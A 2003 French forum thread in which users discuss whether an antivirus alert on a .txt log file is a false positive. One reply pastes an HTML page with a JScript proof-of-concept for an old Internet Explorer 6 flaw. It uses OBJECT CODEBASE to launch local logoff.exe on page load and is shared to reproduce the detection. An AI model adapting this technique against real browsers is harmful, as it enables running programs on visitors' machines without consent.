alerte virus zombie.17654.a.zcme - Sécurité - Windows & Software
Marsh Posté le 24-04-2003 à 00:33:19
si ton antivirus le dit, c'est surement un vrai...
ou alors c'est le poisson d'avril commun et en retard des éditeurs d'antivirus...
Marsh Posté le 24-04-2003 à 00:43:28
le pb c'est que je viens de passer 3 antivirus en ligne et aucun ne le détecte.
Je suis en train de mettre à jour mon antivirus et je vais lancer un nouveau scan.
Marsh Posté le 24-04-2003 à 00:44:26
c'est quoi ton antivirus ?
T'as regardé sur le net ce qui st dit sur ce virus ?
Marsh Posté le 24-04-2003 à 00:47:16
Antivirus kit pro version 11.
J'ai rien trouvé de particulier sur ce virus qui me soit compréhensible. Il est répertorié comme un virus "dos".
Marsh Posté le 24-04-2003 à 00:48:11
weebbeep a écrit : /me smell a fake |
Tu crois que j'ai que ça à faire à cette heure-ci que de balancer un fake.
Marsh Posté le 24-04-2003 à 00:49:49
From Hell a écrit : Tu sais ,les antivirus en ligne c'est pas très fiable |
Je veux bien mais j'en ai quand même essayé trois différents.
J'attends le résultat du scan en cours.
Marsh Posté le 24-04-2003 à 00:50:33
Tu effaces le fichier en question et pis voila, fin de l'alerte !
Marsh Posté le 24-04-2003 à 00:52:40
From Hell a écrit : Tu effaces le fichier en question et pis voila, fin de l'alerte ! |
C'est bien ce que j'aurais fait mais je n'ai pas de copie de ce fichier et j'en ai besoin.
Marsh Posté le 24-04-2003 à 00:54:01
Et ba ouvre le tu verras ce qui vas t'arriver...
Si on te voit plus poster dans 2 minutes c'est que le virus t'auras pété au visage....
Marsh Posté le 24-04-2003 à 01:06:30
Résultat du nouveau scan, il n'a rien détecté cette fois.
Pourtant dans le rapport d'alerte, il m'a mis :
"While Fermer of the file "C:\docs\log.txt" the virus "Zombie.17654.A:ZCME" has been detected by engine "RAV-Engine". File disinfected: Non. File deleted: Non. Quarantine: Non."
Marsh Posté le 24-04-2003 à 01:16:42
fait gaffe il se serre peut etre d'une faille de sécurité de notepad
Marsh Posté le 24-04-2003 à 01:23:46
weebbeep a écrit : fait gaffe il se serre peut etre d'une faille de sécurité de notepad |
Arrête de faire le malin. C'est la deuxième fois qu'il me fait une alerte sur le même fichier en 2 jours. La première fois s'était par un troyen.
J'ai téléchargé plusieurs antitroyen par sécurité qui n'ont rien détecté.
Vu que ce sont des logs, je me demande s'il ne crée pas une fausse alerte chaque fois que le soft met à jour le fichier.
Marsh Posté le 24-04-2003 à 14:23:44
surement que ton antivirus a scanné tous les types de fichiers, et a reconnu la signature d'un virus dans le fichier .txt, alors que les autres antivirus n'ont pas scanné les fichiers .txt (inoffensifs tant que leur extension n'est pas changée) ou ne sont pas basés sur la même signature pour ce virus.
Marsh Posté le 24-04-2003 à 16:35:45
BlackGoddess a écrit : surement que ton antivirus a scanné tous les types de fichiers, et a reconnu la signature d'un virus dans le fichier .txt, alors que les autres antivirus n'ont pas scanné les fichiers .txt (inoffensifs tant que leur extension n'est pas changée) ou ne sont pas basés sur la même signature pour ce virus. |
Je ne comprends pas pourquoi il ne le redétecte pas lors du second scan après la mise à jour.
"While Fermer of the file "C:\docs\log.txt" the virus "Zombie.17654.A:ZCME" has been detected by engine "RAV-Engine". File disinfected: Non. File deleted: Non. Quarantine: Non."
A priori il n'a pas touché au fichier donc il devrait le retrouver.
Marsh Posté le 24-04-2003 à 19:24:24
C'est le log de quoi ton fichier ?
Il est possible qu'il s'y trouve une chaine de caractères correspondant à un virus.
J'avais le même problème en évaluant ton antivirus.
J'ai ouvert le fichier avec notepad et il y avait une page HTML que j'avais du sauvegarder un jour.
La voilà:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
'cwindows/system32/logoff.exe',
'cwinxp/system32/logoff.exe',
'cwinnt/system32/logoff.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
------
Tu peux faire un copier/coller dans un fichiet toto.txt et le scanner pour voir.
Cet AV est un peu trop parano à mon goût
Marsh Posté le 24-04-2003 à 19:46:30
clweb a écrit : C'est le log de quoi ton fichier ? |
Je viens d'essayer avec ton .txt.
J'ai un message indiquant virus probable.
Ca confirme ce que je pensais, il est trop sensible.
Je préfère encore ça que l'inverse.
Merci
Marsh Posté le 23-04-2003 à 23:51:33
Bonsoir,
J'ai une alerte de mon antivirus me disant q'un fichier txt est infecté par "zombie.17654.a.zcme"
Je ne pensais pas qu'un fichier txt pouvait contenir un virus.
Est-ce vrai ou une fausse alerte?
Message édité par JEFLEFOU le 24-04-2003 à 00:11:26